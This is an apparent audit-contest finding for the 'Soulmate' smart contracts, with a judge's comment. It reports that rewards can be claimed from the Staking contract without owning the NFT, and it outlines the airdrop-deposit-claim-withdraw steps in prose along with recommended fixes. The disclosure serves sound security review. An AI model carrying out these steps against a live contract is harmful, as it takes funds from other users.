User can claim large rewards from Staking contract without owning Soulmate
Summary
The vulnerability allows users to claim large rewards from the Staking contract without owning a Soulmate NFT.
Vulnerability Details
We can initiate a series of actions without checking if the user actually owns a Soulmate NFT.
Claiming an airdrop from
Airdrop.sol. This gives us the required amount toStaking::deposit()Approving the transfer of tokens to the Staking contract.
Depositing the tokens into the Staking contract.
Claiming rewards from the Staking contract.
Withdrawing the deposited tokens.
Impact
Users can exploit the system to claim rewards they are not entitled to, potentially leading to financial losses for the contract. From 0 to 5.5e25 tokens(as shown in PoC -Github link) as shown in the attack.
Tools Used
Manual Review
Recommendations
Firstly add a check if the user owns Soulmate NFT. Secondly, keep track of when the user deposits and withdraws his tokens from Staking.sol
Lead Judging Commences
finding-claim-airdrop-without-owning-NFT
High severity, This issue is separated from the flawed `isDivorced()` check presented in issue #168 as even if that is fixed, if ownership is not checked, isDivorced would still default to false and allow bypass to claim airdrops by posing as tokenId 0 in turn resulting in this [important check for token claim is bypassed.](https://github.com/Cyfrin/2024-02-soulmate/blob/b3f9227942ffd5c443ce6bccaa980fea0304c38f/src/Airdrop.sol#L61-L66). #220 is the most comprehensive issue as it correctly recognizes both issues existing within the same function.
Rewards breakdown
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.